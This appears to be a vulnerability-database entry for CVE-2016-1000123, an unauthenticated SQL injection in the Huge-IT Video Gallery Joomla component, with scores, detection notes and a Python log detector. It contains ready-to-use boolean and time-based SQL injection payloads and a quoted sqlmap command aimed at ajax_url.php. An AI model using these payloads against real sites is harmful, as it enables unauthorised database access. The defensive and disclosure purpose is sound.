CVE-2016-1000123
Published 2016-10-06
CVE-2016-1000123: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Priority P263 · critical · 9.8 CVSS 3.0
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 3.63% (88.1th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| huge-it | video_gallery | — | — |
Detection & IOCs (extracted from sources)
command: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2
command: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2
- A high rate of HTTP 500 Internal Server Error responses from the target endpoint during a short window is a strong indicator of active sqlmap-driven exploitation of this vulnerability.
- The vulnerability is unauthenticated — no session cookie or login is required. Any source IP sending POST data with SQL payloads in 'galleryid' to ajax_url.php should be treated as malicious.
- The vulnerable file ajax_url.php is directly web-accessible and bypasses Joomla's normal component routing, meaning standard Joomla access-control checks do not apply to it.
- The fix was introduced in v1.1.0; installations still running v1.0.9 of com_videogallerylite remain fully exposed to unauthenticated exploitation.
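One way to apply the two detection notes above to request records, as an added example (not code from the advisory or from the sources indexed here): it flags sources whose POSTs to ajax_url.php carry a non-integer `galleryid`, and sources that trigger a burst of HTTP 500 responses. The record layout, the thresholds, the per-source grouping and the premise that a legitimate `galleryid` is a plain integer are assumptions; POST bodies have to come from a WAF or proxy that logs them, since standard access logs do not.

```python
from collections import defaultdict
from urllib.parse import parse_qs

ENDPOINT = "/components/com_videogallerylite/ajax_url.php"  # path from the advisory
WINDOW_S = 60   # assumed burst window in seconds, tune per site
MAX_500S = 5    # assumed number of 500s inside the window that counts as a burst


def suspicious_galleryid(body):
    """True if any galleryid value is not a plain ASCII integer (assumed legit form)."""
    values = parse_qs(body, keep_blank_values=True).get("galleryid", [])
    return any(not (v.isascii() and v.isdigit()) for v in values)


def detect(records):
    """records: (epoch_seconds, src_ip, method, path, post_body, status) tuples.
    Returns (sources with a non-integer galleryid, sources with a 500 burst)."""
    bad_param, times_500 = set(), defaultdict(list)
    for ts, ip, method, path, body, status in records:
        if method != "POST" or path != ENDPOINT:
            continue
        if suspicious_galleryid(body):
            bad_param.add(ip)
        if status == 500:
            times_500[ip].append(ts)
    burst = set()
    for ip, stamps in times_500.items():
        stamps.sort()
        # Sliding window: MAX_500S errors whose first and last fall within WINDOW_S.
        for i in range(len(stamps) - MAX_500S + 1):
            if stamps[i + MAX_500S - 1] - stamps[i] <= WINDOW_S:
                burst.add(ip)
                break
    return bad_param, burst


# Constructed sample records, not real traffic; IPs are RFC 5737 documentation ranges.
TAIL = "&task=load_videos_content&perpage=20&linkbutton=2"
SAMPLE = [(1000 + i, "203.0.113.9", "POST", ENDPOINT,
           "page=1&galleryid=(CASE WHEN (1=1) THEN SLEEP(5) ELSE 1 END)" + TAIL, 500)
          for i in range(6)]
SAMPLE.append((1003, "198.51.100.4", "POST", ENDPOINT, "page=1&galleryid=3" + TAIL, 200))
SAMPLE.append((1004, "198.51.100.4", "GET", "/index.php", "", 200))

if __name__ == "__main__":
    flagged, bursts = detect(SAMPLE)
    print("non-integer galleryid:", sorted(flagged))
    print("HTTP 500 burst:", sorted(bursts))
```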
CVSS provenance
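| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |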
No detection rules found.
Exploit-DB
Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection
exploitdb·2017-08-31·CVSS 9.8
---
# Exploit Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
# Google Dork: [if applicable]
# Date: 2016-09-15
# Exploit Author: Larry W. Cashdollar, @_larry0
# Vendor Homepage: http://huge-it.com/joomla-video-gallery/
# Software Link:
# Version: 1.0.9
# Tested on: Linux
# CVE : CVE-2016-1000123
# Advisory: http://www.vapidlabs.com/advisory.php?v=169
# Exploit:
$ sqlmap -u 'http://server/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2"
.
.
.
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 2870
Exploit-DB
Joomla! Component com_videogallerylite 1.0.9 - SQL Injection
exploitdb·2016-09-22·CVSS 9.8
---
Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-15
Download Site: http://huge-it.com/joomla-video-gallery/
Vendor: www.huge-it.com, fixed v1.1.0
Vendor Notified: 2016-09-17
Vendor Contact: [email protected]
Description: A video slideshow gallery.
Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL into functions located in ajax_url.php.
Vulnerable code in: ajax_url.php
define('_JEXEC',1);
defined('_JEXEC') or die('Restircted access');
.
.
.
if($_POST['task']=="load_videos_content"){

    $page = 1;


    if(!empty($_POST["page"]) && is_numeric($_POST['page']) && $_POST['page']>0){
        $
No writeups or analysis indexed.
- http://huge-it.com/joomla-video-gallery/
- http://www.securityfocus.com/bid/93107
- http://www.vapidlabs.com/advisory.php?v=169
- https://www.exploit-db.com/exploits/42596/

Published: 2016-10-06